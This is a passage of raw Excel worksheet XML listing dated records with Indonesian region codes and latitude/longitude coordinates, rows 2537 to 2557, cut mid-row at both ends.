      </c>
      <c r="C2537" s="2">
        <v>0.53087962962962965</v>
      </c>
      <c r="D2537" t="s">
        <v>22</v>
      </c>
      <c r="E2537" t="s">
        <v>23</v>
      </c>
      <c r="F2537" t="s">
        <v>8523</v>
      </c>
      <c r="G2537" t="s">
        <v>8524</v>
      </c>
      <c r="H2537" t="s">
        <v>8525</v>
      </c>
      <c r="I2537" t="s">
        <v>8526</v>
      </c>
      <c r="J2537" t="s">
        <v>2627</v>
      </c>
      <c r="L2537" t="s">
        <v>8527</v>
      </c>
      <c r="M2537">
        <v>3211030011</v>
      </c>
      <c r="N2537">
        <v>3211030</v>
      </c>
      <c r="O2537">
        <v>3211</v>
      </c>
      <c r="P2537">
        <v>32</v>
      </c>
      <c r="Q2537" t="s">
        <v>5124</v>
      </c>
      <c r="R2537" t="s">
        <v>8528</v>
      </c>
      <c r="S2537" t="s">
        <v>1797</v>
      </c>
      <c r="T2537" t="s">
        <v>42</v>
      </c>
      <c r="U2537" s="5">
        <v>10779564</v>
      </c>
      <c r="V2537" s="5" t="s">
        <v>16720</v>
      </c>
      <c r="W2537" s="5">
        <v>-690861</v>
      </c>
      <c r="X2537" t="s">
        <v>20462</v>
      </c>
      <c r="Y2537" t="str">
        <f t="shared" si="39"/>
        <v>-6.90861,107.79564</v>
      </c>
    </row>
    <row r="2538" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2538">
        <v>224567</v>
      </c>
      <c r="B2538" s="1">
        <v>44177</v>
      </c>
      <c r="C2538" s="2">
        <v>0.35738425925925926</v>
      </c>
      <c r="D2538" t="s">
        <v>22</v>
      </c>
      <c r="E2538" t="s">
        <v>23</v>
      </c>
      <c r="F2538" t="s">
        <v>8529</v>
      </c>
      <c r="G2538" t="s">
        <v>8530</v>
      </c>
      <c r="H2538" t="s">
        <v>7086</v>
      </c>
      <c r="I2538" t="s">
        <v>8531</v>
      </c>
      <c r="J2538" t="s">
        <v>2627</v>
      </c>
      <c r="L2538" t="s">
        <v>8532</v>
      </c>
      <c r="M2538">
        <v>3205020004</v>
      </c>
      <c r="N2538">
        <v>3205020</v>
      </c>
      <c r="O2538">
        <v>3205</v>
      </c>
      <c r="P2538">
        <v>32</v>
      </c>
      <c r="Q2538" t="s">
        <v>8533</v>
      </c>
      <c r="R2538" t="s">
        <v>8534</v>
      </c>
      <c r="S2538" t="s">
        <v>1866</v>
      </c>
      <c r="T2538" t="s">
        <v>42</v>
      </c>
      <c r="U2538" s="5">
        <v>10751132</v>
      </c>
      <c r="V2538" s="5" t="s">
        <v>16721</v>
      </c>
      <c r="W2538" s="5">
        <v>-730049</v>
      </c>
      <c r="X2538" t="s">
        <v>20463</v>
      </c>
      <c r="Y2538" t="str">
        <f t="shared" si="39"/>
        <v>-7.30049,107.51132</v>
      </c>
    </row>
    <row r="2539" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2539">
        <v>224568</v>
      </c>
      <c r="B2539" s="1">
        <v>44177</v>
      </c>
      <c r="C2539" s="2">
        <v>0.3588425925925926</v>
      </c>
      <c r="D2539" t="s">
        <v>22</v>
      </c>
      <c r="E2539" t="s">
        <v>23</v>
      </c>
      <c r="F2539" s="3" t="s">
        <v>8535</v>
      </c>
      <c r="H2539" t="s">
        <v>7086</v>
      </c>
      <c r="I2539" t="s">
        <v>7087</v>
      </c>
      <c r="J2539" t="s">
        <v>2627</v>
      </c>
      <c r="L2539" t="s">
        <v>8536</v>
      </c>
      <c r="M2539">
        <v>3205020004</v>
      </c>
      <c r="N2539">
        <v>3205020</v>
      </c>
      <c r="O2539">
        <v>3205</v>
      </c>
      <c r="P2539">
        <v>32</v>
      </c>
      <c r="Q2539" t="s">
        <v>8533</v>
      </c>
      <c r="R2539" t="s">
        <v>8534</v>
      </c>
      <c r="S2539" t="s">
        <v>1866</v>
      </c>
      <c r="T2539" t="s">
        <v>42</v>
      </c>
      <c r="U2539" s="5">
        <v>10751122</v>
      </c>
      <c r="V2539" s="5" t="s">
        <v>16722</v>
      </c>
      <c r="W2539" s="5">
        <v>-730055</v>
      </c>
      <c r="X2539" t="s">
        <v>20464</v>
      </c>
      <c r="Y2539" t="str">
        <f t="shared" si="39"/>
        <v>-7.30055,107.51122</v>
      </c>
    </row>
    <row r="2540" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2540">
        <v>224569</v>
      </c>
      <c r="B2540" s="1">
        <v>44178</v>
      </c>
      <c r="C2540" s="2">
        <v>0.41878472222222224</v>
      </c>
      <c r="D2540" t="s">
        <v>22</v>
      </c>
      <c r="E2540" t="s">
        <v>23</v>
      </c>
      <c r="F2540" t="s">
        <v>8537</v>
      </c>
      <c r="G2540" t="s">
        <v>8538</v>
      </c>
      <c r="H2540" t="s">
        <v>26</v>
      </c>
      <c r="I2540" t="s">
        <v>27</v>
      </c>
      <c r="J2540" t="s">
        <v>2622</v>
      </c>
      <c r="L2540" t="s">
        <v>8539</v>
      </c>
      <c r="M2540">
        <v>3525060008</v>
      </c>
      <c r="N2540">
        <v>3525060</v>
      </c>
      <c r="O2540">
        <v>3525</v>
      </c>
      <c r="P2540">
        <v>35</v>
      </c>
      <c r="Q2540" t="s">
        <v>8540</v>
      </c>
      <c r="R2540" t="s">
        <v>1367</v>
      </c>
      <c r="S2540" t="s">
        <v>1368</v>
      </c>
      <c r="T2540" t="s">
        <v>1221</v>
      </c>
      <c r="U2540" s="5">
        <v>11249155</v>
      </c>
      <c r="V2540" s="5" t="s">
        <v>16723</v>
      </c>
      <c r="W2540" s="5">
        <v>-725943</v>
      </c>
      <c r="X2540" t="s">
        <v>20465</v>
      </c>
      <c r="Y2540" t="str">
        <f t="shared" si="39"/>
        <v>-7.25943,112.49155</v>
      </c>
    </row>
    <row r="2541" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2541">
        <v>224570</v>
      </c>
      <c r="B2541" s="1">
        <v>44178</v>
      </c>
      <c r="C2541" s="2">
        <v>0.6232523148148148</v>
      </c>
      <c r="D2541" t="s">
        <v>22</v>
      </c>
      <c r="E2541" t="s">
        <v>23</v>
      </c>
      <c r="F2541" t="s">
        <v>8541</v>
      </c>
      <c r="H2541" t="s">
        <v>26</v>
      </c>
      <c r="I2541" t="s">
        <v>893</v>
      </c>
      <c r="J2541" t="s">
        <v>2622</v>
      </c>
      <c r="L2541" t="s">
        <v>8542</v>
      </c>
      <c r="M2541">
        <v>3502090013</v>
      </c>
      <c r="N2541">
        <v>3502090</v>
      </c>
      <c r="O2541">
        <v>3502</v>
      </c>
      <c r="P2541">
        <v>35</v>
      </c>
      <c r="Q2541" t="s">
        <v>8543</v>
      </c>
      <c r="R2541" t="s">
        <v>8543</v>
      </c>
      <c r="S2541" t="s">
        <v>7998</v>
      </c>
      <c r="T2541" t="s">
        <v>1221</v>
      </c>
      <c r="U2541" s="5">
        <v>11149088</v>
      </c>
      <c r="V2541" s="5" t="s">
        <v>16724</v>
      </c>
      <c r="W2541" s="5">
        <v>-789177</v>
      </c>
      <c r="X2541" t="s">
        <v>20466</v>
      </c>
      <c r="Y2541" t="str">
        <f t="shared" si="39"/>
        <v>-7.89177,111.49088</v>
      </c>
    </row>
    <row r="2542" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2542">
        <v>224571</v>
      </c>
      <c r="B2542" s="1">
        <v>44178</v>
      </c>
      <c r="C2542" s="2">
        <v>0.70491898148148147</v>
      </c>
      <c r="D2542" t="s">
        <v>22</v>
      </c>
      <c r="E2542" t="s">
        <v>23</v>
      </c>
      <c r="F2542" t="s">
        <v>8544</v>
      </c>
      <c r="H2542" t="s">
        <v>26</v>
      </c>
      <c r="I2542" t="s">
        <v>137</v>
      </c>
      <c r="J2542" t="s">
        <v>2622</v>
      </c>
      <c r="L2542" t="s">
        <v>8545</v>
      </c>
      <c r="M2542">
        <v>3525060014</v>
      </c>
      <c r="N2542">
        <v>3525060</v>
      </c>
      <c r="O2542">
        <v>3525</v>
      </c>
      <c r="P2542">
        <v>35</v>
      </c>
      <c r="Q2542" t="s">
        <v>8546</v>
      </c>
      <c r="R2542" t="s">
        <v>1367</v>
      </c>
      <c r="S2542" t="s">
        <v>1368</v>
      </c>
      <c r="T2542" t="s">
        <v>1221</v>
      </c>
      <c r="U2542" s="5">
        <v>11249983</v>
      </c>
      <c r="V2542" s="5" t="s">
        <v>16725</v>
      </c>
      <c r="W2542" s="5">
        <v>-724734</v>
      </c>
      <c r="X2542" t="s">
        <v>20467</v>
      </c>
      <c r="Y2542" t="str">
        <f t="shared" si="39"/>
        <v>-7.24734,112.49983</v>
      </c>
    </row>
    <row r="2543" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2543">
        <v>224572</v>
      </c>
      <c r="B2543" s="1">
        <v>44178</v>
      </c>
      <c r="C2543" s="2">
        <v>0.79226851851851843</v>
      </c>
      <c r="D2543" t="s">
        <v>22</v>
      </c>
      <c r="E2543" t="s">
        <v>23</v>
      </c>
      <c r="F2543" t="s">
        <v>8547</v>
      </c>
      <c r="G2543" t="s">
        <v>8548</v>
      </c>
      <c r="H2543" t="s">
        <v>26</v>
      </c>
      <c r="I2543" t="s">
        <v>2005</v>
      </c>
      <c r="J2543" t="s">
        <v>2622</v>
      </c>
      <c r="L2543" t="s">
        <v>8549</v>
      </c>
      <c r="M2543">
        <v>3525060008</v>
      </c>
      <c r="N2543">
        <v>3525060</v>
      </c>
      <c r="O2543">
        <v>3525</v>
      </c>
      <c r="P2543">
        <v>35</v>
      </c>
      <c r="Q2543" t="s">
        <v>8540</v>
      </c>
      <c r="R2543" t="s">
        <v>1367</v>
      </c>
      <c r="S2543" t="s">
        <v>1368</v>
      </c>
      <c r="T2543" t="s">
        <v>1221</v>
      </c>
      <c r="U2543" s="5">
        <v>11248972</v>
      </c>
      <c r="V2543" s="5" t="s">
        <v>16726</v>
      </c>
      <c r="W2543" s="5">
        <v>-725846</v>
      </c>
      <c r="X2543" t="s">
        <v>20468</v>
      </c>
      <c r="Y2543" t="str">
        <f t="shared" si="39"/>
        <v>-7.25846,112.48972</v>
      </c>
    </row>
    <row r="2544" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2544">
        <v>224573</v>
      </c>
      <c r="B2544" s="1">
        <v>44179</v>
      </c>
      <c r="C2544" s="2">
        <v>6.1805555555555563E-3</v>
      </c>
      <c r="D2544" t="s">
        <v>22</v>
      </c>
      <c r="E2544" t="s">
        <v>23</v>
      </c>
      <c r="F2544" t="s">
        <v>8550</v>
      </c>
      <c r="G2544" t="s">
        <v>8551</v>
      </c>
      <c r="H2544" t="s">
        <v>26</v>
      </c>
      <c r="I2544" t="s">
        <v>137</v>
      </c>
      <c r="J2544" t="s">
        <v>2608</v>
      </c>
      <c r="L2544" t="s">
        <v>8552</v>
      </c>
      <c r="M2544">
        <v>3372040006</v>
      </c>
      <c r="N2544">
        <v>3372040</v>
      </c>
      <c r="O2544">
        <v>3372</v>
      </c>
      <c r="P2544">
        <v>33</v>
      </c>
      <c r="Q2544" t="s">
        <v>8553</v>
      </c>
      <c r="R2544" t="s">
        <v>8554</v>
      </c>
      <c r="S2544" t="s">
        <v>8555</v>
      </c>
      <c r="T2544" t="s">
        <v>1134</v>
      </c>
      <c r="U2544" s="5">
        <v>11085630</v>
      </c>
      <c r="V2544" s="5" t="s">
        <v>16727</v>
      </c>
      <c r="W2544" s="5">
        <v>-756508</v>
      </c>
      <c r="X2544" t="s">
        <v>20469</v>
      </c>
      <c r="Y2544" t="str">
        <f t="shared" si="39"/>
        <v>-7.56508,110.85630</v>
      </c>
    </row>
    <row r="2545" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2545">
        <v>224574</v>
      </c>
      <c r="B2545" s="1">
        <v>44179</v>
      </c>
      <c r="C2545" s="2">
        <v>8.8495370370370363E-2</v>
      </c>
      <c r="D2545" t="s">
        <v>22</v>
      </c>
      <c r="E2545" t="s">
        <v>23</v>
      </c>
      <c r="F2545" t="s">
        <v>8556</v>
      </c>
      <c r="G2545" t="s">
        <v>8557</v>
      </c>
      <c r="H2545" t="s">
        <v>26</v>
      </c>
      <c r="I2545" t="s">
        <v>1447</v>
      </c>
      <c r="J2545" t="s">
        <v>6940</v>
      </c>
      <c r="L2545" t="s">
        <v>3876</v>
      </c>
      <c r="M2545">
        <v>1174030008</v>
      </c>
      <c r="N2545">
        <v>1174030</v>
      </c>
      <c r="O2545">
        <v>1174</v>
      </c>
      <c r="P2545">
        <v>11</v>
      </c>
      <c r="Q2545" t="s">
        <v>8558</v>
      </c>
      <c r="R2545" t="s">
        <v>8559</v>
      </c>
      <c r="S2545" t="s">
        <v>8477</v>
      </c>
      <c r="T2545" t="s">
        <v>6945</v>
      </c>
      <c r="U2545" s="5">
        <v>9714522</v>
      </c>
      <c r="V2545" s="5" t="s">
        <v>16728</v>
      </c>
      <c r="W2545" s="5">
        <v>518265</v>
      </c>
      <c r="X2545" t="s">
        <v>20470</v>
      </c>
      <c r="Y2545" t="str">
        <f t="shared" si="39"/>
        <v>5.18265,97.14522</v>
      </c>
    </row>
    <row r="2546" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2546">
        <v>224644</v>
      </c>
      <c r="B2546" s="1">
        <v>44182</v>
      </c>
      <c r="C2546" s="2">
        <v>0.1111111111111111</v>
      </c>
      <c r="D2546" t="s">
        <v>2648</v>
      </c>
      <c r="E2546" t="s">
        <v>23</v>
      </c>
      <c r="G2546" t="s">
        <v>8560</v>
      </c>
      <c r="H2546" t="s">
        <v>26</v>
      </c>
      <c r="J2546" t="s">
        <v>6444</v>
      </c>
      <c r="L2546" t="s">
        <v>8561</v>
      </c>
      <c r="M2546">
        <v>3175030001</v>
      </c>
      <c r="N2546">
        <v>3175030</v>
      </c>
      <c r="O2546">
        <v>3175</v>
      </c>
      <c r="P2546">
        <v>31</v>
      </c>
      <c r="Q2546" t="s">
        <v>1574</v>
      </c>
      <c r="R2546" t="s">
        <v>1563</v>
      </c>
      <c r="S2546" t="s">
        <v>547</v>
      </c>
      <c r="T2546" t="s">
        <v>33</v>
      </c>
      <c r="U2546" s="5">
        <v>10685568</v>
      </c>
      <c r="V2546" s="5" t="s">
        <v>16729</v>
      </c>
      <c r="W2546" s="5">
        <v>-613964</v>
      </c>
      <c r="X2546" t="s">
        <v>18676</v>
      </c>
      <c r="Y2546" t="str">
        <f t="shared" si="39"/>
        <v>-6.13964,106.85568</v>
      </c>
    </row>
    <row r="2547" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2547">
        <v>224647</v>
      </c>
      <c r="B2547" s="1">
        <v>44182</v>
      </c>
      <c r="C2547" s="2">
        <v>0.11666666666666665</v>
      </c>
      <c r="D2547" t="s">
        <v>2648</v>
      </c>
      <c r="E2547" t="s">
        <v>23</v>
      </c>
      <c r="G2547" t="s">
        <v>8562</v>
      </c>
      <c r="H2547" t="s">
        <v>26</v>
      </c>
      <c r="J2547" t="s">
        <v>6444</v>
      </c>
      <c r="L2547" t="s">
        <v>8563</v>
      </c>
      <c r="M2547">
        <v>3175030001</v>
      </c>
      <c r="N2547">
        <v>3175030</v>
      </c>
      <c r="O2547">
        <v>3175</v>
      </c>
      <c r="P2547">
        <v>31</v>
      </c>
      <c r="Q2547" t="s">
        <v>1574</v>
      </c>
      <c r="R2547" t="s">
        <v>1563</v>
      </c>
      <c r="S2547" t="s">
        <v>547</v>
      </c>
      <c r="T2547" t="s">
        <v>33</v>
      </c>
      <c r="U2547" s="5">
        <v>10685558</v>
      </c>
      <c r="V2547" s="5" t="s">
        <v>16730</v>
      </c>
      <c r="W2547" s="5">
        <v>-613857</v>
      </c>
      <c r="X2547" t="s">
        <v>20471</v>
      </c>
      <c r="Y2547" t="str">
        <f t="shared" si="39"/>
        <v>-6.13857,106.85558</v>
      </c>
    </row>
    <row r="2548" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2548">
        <v>224648</v>
      </c>
      <c r="B2548" s="1">
        <v>44182</v>
      </c>
      <c r="C2548" s="2">
        <v>0.11597222222222221</v>
      </c>
      <c r="D2548" t="s">
        <v>2648</v>
      </c>
      <c r="E2548" t="s">
        <v>23</v>
      </c>
      <c r="G2548" t="s">
        <v>8564</v>
      </c>
      <c r="H2548" t="s">
        <v>26</v>
      </c>
      <c r="J2548" t="s">
        <v>6444</v>
      </c>
      <c r="L2548" t="s">
        <v>8565</v>
      </c>
      <c r="M2548">
        <v>3175030001</v>
      </c>
      <c r="N2548">
        <v>3175030</v>
      </c>
      <c r="O2548">
        <v>3175</v>
      </c>
      <c r="P2548">
        <v>31</v>
      </c>
      <c r="Q2548" t="s">
        <v>1574</v>
      </c>
      <c r="R2548" t="s">
        <v>1563</v>
      </c>
      <c r="S2548" t="s">
        <v>547</v>
      </c>
      <c r="T2548" t="s">
        <v>33</v>
      </c>
      <c r="U2548" s="5">
        <v>10685570</v>
      </c>
      <c r="V2548" s="5" t="s">
        <v>16731</v>
      </c>
      <c r="W2548" s="5">
        <v>-613917</v>
      </c>
      <c r="X2548" t="s">
        <v>20472</v>
      </c>
      <c r="Y2548" t="str">
        <f t="shared" si="39"/>
        <v>-6.13917,106.85570</v>
      </c>
    </row>
    <row r="2549" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2549">
        <v>224654</v>
      </c>
      <c r="B2549" s="1">
        <v>44183</v>
      </c>
      <c r="C2549" s="2">
        <v>4.8819444444444443E-2</v>
      </c>
      <c r="D2549" t="s">
        <v>22</v>
      </c>
      <c r="E2549" t="s">
        <v>23</v>
      </c>
      <c r="F2549" t="s">
        <v>8566</v>
      </c>
      <c r="G2549" t="s">
        <v>8567</v>
      </c>
      <c r="H2549" t="s">
        <v>26</v>
      </c>
      <c r="I2549" t="s">
        <v>137</v>
      </c>
      <c r="J2549" t="s">
        <v>6940</v>
      </c>
      <c r="L2549" t="s">
        <v>8568</v>
      </c>
      <c r="M2549">
        <v>1174030007</v>
      </c>
      <c r="N2549">
        <v>1174030</v>
      </c>
      <c r="O2549">
        <v>1174</v>
      </c>
      <c r="P2549">
        <v>11</v>
      </c>
      <c r="Q2549" t="s">
        <v>8569</v>
      </c>
      <c r="R2549" t="s">
        <v>8559</v>
      </c>
      <c r="S2549" t="s">
        <v>8477</v>
      </c>
      <c r="T2549" t="s">
        <v>6945</v>
      </c>
      <c r="U2549" s="5">
        <v>9714543</v>
      </c>
      <c r="V2549" s="5" t="s">
        <v>16732</v>
      </c>
      <c r="W2549" s="5">
        <v>518161</v>
      </c>
      <c r="X2549" t="s">
        <v>20473</v>
      </c>
      <c r="Y2549" t="str">
        <f t="shared" si="39"/>
        <v>5.18161,97.14543</v>
      </c>
    </row>
    <row r="2550" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2550">
        <v>224656</v>
      </c>
      <c r="B2550" s="1">
        <v>44183</v>
      </c>
      <c r="C2550" s="2">
        <v>0.57734953703703706</v>
      </c>
      <c r="D2550" t="s">
        <v>22</v>
      </c>
      <c r="E2550" t="s">
        <v>23</v>
      </c>
      <c r="F2550" t="s">
        <v>8570</v>
      </c>
      <c r="G2550" t="s">
        <v>8571</v>
      </c>
      <c r="H2550" t="s">
        <v>26</v>
      </c>
      <c r="I2550" t="s">
        <v>8572</v>
      </c>
      <c r="J2550" t="s">
        <v>2622</v>
      </c>
      <c r="M2550">
        <v>3528050015</v>
      </c>
      <c r="N2550">
        <v>3528050</v>
      </c>
      <c r="O2550">
        <v>3528</v>
      </c>
      <c r="P2550">
        <v>35</v>
      </c>
      <c r="Q2550" t="s">
        <v>8573</v>
      </c>
      <c r="R2550" t="s">
        <v>8574</v>
      </c>
      <c r="S2550" t="s">
        <v>8574</v>
      </c>
      <c r="T2550" t="s">
        <v>1221</v>
      </c>
      <c r="U2550" s="5">
        <v>11347868</v>
      </c>
      <c r="V2550" s="5" t="s">
        <v>16733</v>
      </c>
      <c r="W2550" s="5">
        <v>-715476</v>
      </c>
      <c r="X2550" t="s">
        <v>20474</v>
      </c>
      <c r="Y2550" t="str">
        <f t="shared" si="39"/>
        <v>-7.15476,113.47868</v>
      </c>
    </row>
    <row r="2551" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2551">
        <v>224657</v>
      </c>
      <c r="B2551" s="1">
        <v>44184</v>
      </c>
      <c r="C2551" s="2">
        <v>0.17406250000000001</v>
      </c>
      <c r="D2551" t="s">
        <v>85</v>
      </c>
      <c r="E2551" t="s">
        <v>23</v>
      </c>
      <c r="F2551" t="s">
        <v>8575</v>
      </c>
      <c r="G2551" t="s">
        <v>8576</v>
      </c>
      <c r="H2551" t="s">
        <v>26</v>
      </c>
      <c r="J2551" t="s">
        <v>6626</v>
      </c>
      <c r="K2551" t="s">
        <v>8577</v>
      </c>
      <c r="L2551" t="s">
        <v>8578</v>
      </c>
      <c r="M2551">
        <v>7371100013</v>
      </c>
      <c r="N2551">
        <v>7371100</v>
      </c>
      <c r="O2551">
        <v>7371</v>
      </c>
      <c r="P2551">
        <v>73</v>
      </c>
      <c r="Q2551" t="s">
        <v>8579</v>
      </c>
      <c r="R2551" t="s">
        <v>8580</v>
      </c>
      <c r="S2551" t="s">
        <v>6629</v>
      </c>
      <c r="T2551" t="s">
        <v>6630</v>
      </c>
      <c r="U2551" s="5">
        <v>11943938</v>
      </c>
      <c r="V2551" s="5" t="s">
        <v>16734</v>
      </c>
      <c r="W2551" s="5">
        <v>-514128</v>
      </c>
      <c r="X2551" t="s">
        <v>20475</v>
      </c>
      <c r="Y2551" t="str">
        <f t="shared" si="39"/>
        <v>-5.14128,119.43938</v>
      </c>
    </row>
    <row r="2552" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2552">
        <v>224659</v>
      </c>
      <c r="B2552" s="1">
        <v>44184</v>
      </c>
      <c r="C2552" s="2">
        <v>0.37936342592592592</v>
      </c>
      <c r="D2552" t="s">
        <v>85</v>
      </c>
      <c r="E2552" t="s">
        <v>23</v>
      </c>
      <c r="F2552" t="s">
        <v>8581</v>
      </c>
      <c r="G2552" t="s">
        <v>8582</v>
      </c>
      <c r="H2552" t="s">
        <v>26</v>
      </c>
      <c r="J2552" t="s">
        <v>6626</v>
      </c>
      <c r="K2552" t="s">
        <v>8583</v>
      </c>
      <c r="L2552" t="s">
        <v>8584</v>
      </c>
      <c r="M2552">
        <v>7371111003</v>
      </c>
      <c r="N2552">
        <v>7371111</v>
      </c>
      <c r="O2552">
        <v>7371</v>
      </c>
      <c r="P2552">
        <v>73</v>
      </c>
      <c r="Q2552" t="s">
        <v>7102</v>
      </c>
      <c r="R2552" t="s">
        <v>7102</v>
      </c>
      <c r="S2552" t="s">
        <v>6629</v>
      </c>
      <c r="T2552" t="s">
        <v>6630</v>
      </c>
      <c r="U2552" s="5">
        <v>11949820</v>
      </c>
      <c r="V2552" s="5" t="s">
        <v>16735</v>
      </c>
      <c r="W2552" s="5">
        <v>-513059</v>
      </c>
      <c r="X2552" t="s">
        <v>20476</v>
      </c>
      <c r="Y2552" t="str">
        <f t="shared" si="39"/>
        <v>-5.13059,119.49820</v>
      </c>
    </row>
    <row r="2553" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2553">
        <v>224664</v>
      </c>
      <c r="B2553" s="1">
        <v>44186</v>
      </c>
      <c r="C2553" s="2">
        <v>3.0162037037037032E-2</v>
      </c>
      <c r="D2553" t="s">
        <v>22</v>
      </c>
      <c r="E2553" t="s">
        <v>23</v>
      </c>
      <c r="F2553" t="s">
        <v>8585</v>
      </c>
      <c r="G2553" t="s">
        <v>8586</v>
      </c>
      <c r="H2553" t="s">
        <v>26</v>
      </c>
      <c r="I2553" t="s">
        <v>137</v>
      </c>
      <c r="J2553" t="s">
        <v>6626</v>
      </c>
      <c r="L2553" t="s">
        <v>8587</v>
      </c>
      <c r="M2553">
        <v>7371101004</v>
      </c>
      <c r="N2553">
        <v>7371101</v>
      </c>
      <c r="O2553">
        <v>7371</v>
      </c>
      <c r="P2553">
        <v>73</v>
      </c>
      <c r="Q2553" t="s">
        <v>8588</v>
      </c>
      <c r="R2553" t="s">
        <v>8588</v>
      </c>
      <c r="S2553" t="s">
        <v>6629</v>
      </c>
      <c r="T2553" t="s">
        <v>6630</v>
      </c>
      <c r="U2553" s="5">
        <v>11949800</v>
      </c>
      <c r="V2553" s="5" t="s">
        <v>16736</v>
      </c>
      <c r="W2553" s="5">
        <v>-516853</v>
      </c>
      <c r="X2553" t="s">
        <v>20477</v>
      </c>
      <c r="Y2553" t="str">
        <f t="shared" si="39"/>
        <v>-5.16853,119.49800</v>
      </c>
    </row>
    <row r="2554" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2554">
        <v>224665</v>
      </c>
      <c r="B2554" s="1">
        <v>44186</v>
      </c>
      <c r="C2554" s="2">
        <v>3.7499999999999999E-2</v>
      </c>
      <c r="D2554" t="s">
        <v>2648</v>
      </c>
      <c r="E2554" t="s">
        <v>23</v>
      </c>
      <c r="G2554" t="s">
        <v>8589</v>
      </c>
      <c r="H2554" t="s">
        <v>26</v>
      </c>
      <c r="J2554" t="s">
        <v>5784</v>
      </c>
      <c r="L2554" t="s">
        <v>8590</v>
      </c>
      <c r="M2554">
        <v>3173070003</v>
      </c>
      <c r="N2554">
        <v>3173070</v>
      </c>
      <c r="O2554">
        <v>3173</v>
      </c>
      <c r="P2554">
        <v>31</v>
      </c>
      <c r="Q2554" t="s">
        <v>520</v>
      </c>
      <c r="R2554" t="s">
        <v>323</v>
      </c>
      <c r="S2554" t="s">
        <v>62</v>
      </c>
      <c r="T2554" t="s">
        <v>33</v>
      </c>
      <c r="U2554" s="5">
        <v>10683345</v>
      </c>
      <c r="V2554" s="5" t="s">
        <v>16737</v>
      </c>
      <c r="W2554" s="5">
        <v>-614883</v>
      </c>
      <c r="X2554" t="s">
        <v>20478</v>
      </c>
      <c r="Y2554" t="str">
        <f t="shared" si="39"/>
        <v>-6.14883,106.83345</v>
      </c>
    </row>
    <row r="2555" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2555">
        <v>224671</v>
      </c>
      <c r="B2555" s="1">
        <v>44186</v>
      </c>
      <c r="C2555" s="2">
        <v>0.3062037037037037</v>
      </c>
      <c r="D2555" t="s">
        <v>22</v>
      </c>
      <c r="E2555" t="s">
        <v>23</v>
      </c>
      <c r="F2555" t="s">
        <v>8591</v>
      </c>
      <c r="G2555" t="s">
        <v>8592</v>
      </c>
      <c r="H2555" t="s">
        <v>26</v>
      </c>
      <c r="I2555" t="s">
        <v>1359</v>
      </c>
      <c r="J2555" t="s">
        <v>6626</v>
      </c>
      <c r="L2555" t="s">
        <v>8593</v>
      </c>
      <c r="M2555">
        <v>7371111002</v>
      </c>
      <c r="N2555">
        <v>7371111</v>
      </c>
      <c r="O2555">
        <v>7371</v>
      </c>
      <c r="P2555">
        <v>73</v>
      </c>
      <c r="Q2555" t="s">
        <v>8594</v>
      </c>
      <c r="R2555" t="s">
        <v>7102</v>
      </c>
      <c r="S2555" t="s">
        <v>6629</v>
      </c>
      <c r="T2555" t="s">
        <v>6630</v>
      </c>
      <c r="U2555" s="5">
        <v>11948859</v>
      </c>
      <c r="V2555" s="5" t="s">
        <v>16738</v>
      </c>
      <c r="W2555" s="5">
        <v>-514701</v>
      </c>
      <c r="X2555" t="s">
        <v>20479</v>
      </c>
      <c r="Y2555" t="str">
        <f t="shared" si="39"/>
        <v>-5.14701,119.48859</v>
      </c>
    </row>
    <row r="2556" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2556">
        <v>224673</v>
      </c>
      <c r="B2556" s="1">
        <v>44187</v>
      </c>
      <c r="C2556" s="2">
        <v>0.56641203703703702</v>
      </c>
      <c r="D2556" t="s">
        <v>22</v>
      </c>
      <c r="E2556" t="s">
        <v>23</v>
      </c>
      <c r="F2556" t="s">
        <v>8595</v>
      </c>
      <c r="H2556" t="s">
        <v>26</v>
      </c>
      <c r="I2556" t="s">
        <v>523</v>
      </c>
      <c r="J2556" t="s">
        <v>2627</v>
      </c>
      <c r="L2556" t="s">
        <v>250</v>
      </c>
      <c r="M2556">
        <v>3209151004</v>
      </c>
      <c r="N2556">
        <v>3209151</v>
      </c>
      <c r="O2556">
        <v>3209</v>
      </c>
      <c r="P2556">
        <v>32</v>
      </c>
      <c r="Q2556" t="s">
        <v>8596</v>
      </c>
      <c r="R2556" t="s">
        <v>8597</v>
      </c>
      <c r="S2556" t="s">
        <v>6532</v>
      </c>
      <c r="T2556" t="s">
        <v>42</v>
      </c>
      <c r="U2556" s="5">
        <v>10851180</v>
      </c>
      <c r="V2556" s="5" t="s">
        <v>16739</v>
      </c>
      <c r="W2556" s="5">
        <v>-669025</v>
      </c>
      <c r="X2556" t="s">
        <v>20480</v>
      </c>
      <c r="Y2556" t="str">
        <f t="shared" si="39"/>
        <v>-6.69025,108.51180</v>
      </c>
    </row>
    <row r="2557" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2557">
        <v>224674</v>
      </c>
      <c r="B2557" s="1">
        <v>44189</v>
      </c>
      <c r="C2557" s="2">
        <v>0.46635416666666668</v>
      </c>
      <c r="D2557" t="s">
        <v>22</v>
      </c>
      <c r="E2557" t="s">
        <v>23</v>
      </c>
      <c r="F2557" t="s">
        <v>8598</v>
      </c>
      <c r="G2557" t="s">
        <v>8599</v>
      </c>
      <c r="H2557" t="s">
        <v>26</v>
      </c>
      <c r="I2557" t="s">
        <v>893</v>
      </c>
      <c r="J2557" t="s">
        <v>2627</v>
      </c>
      <c r="L2557" t="s">
        <v>8600</v>
      </c>
      <c r="M2557">
        <v>3273240002</v>
      </c>
      <c r="N2557">
        <v>3273240</v>
      </c>
      <c r="O2557">
        <v>3273</v>
      </c>
      <c r="P2557">
        <v>32</v>
      </c>
      <c r="Q2557" t="s">
        <v>8601</v>
      </c>
      <c r="R2557" t="s">
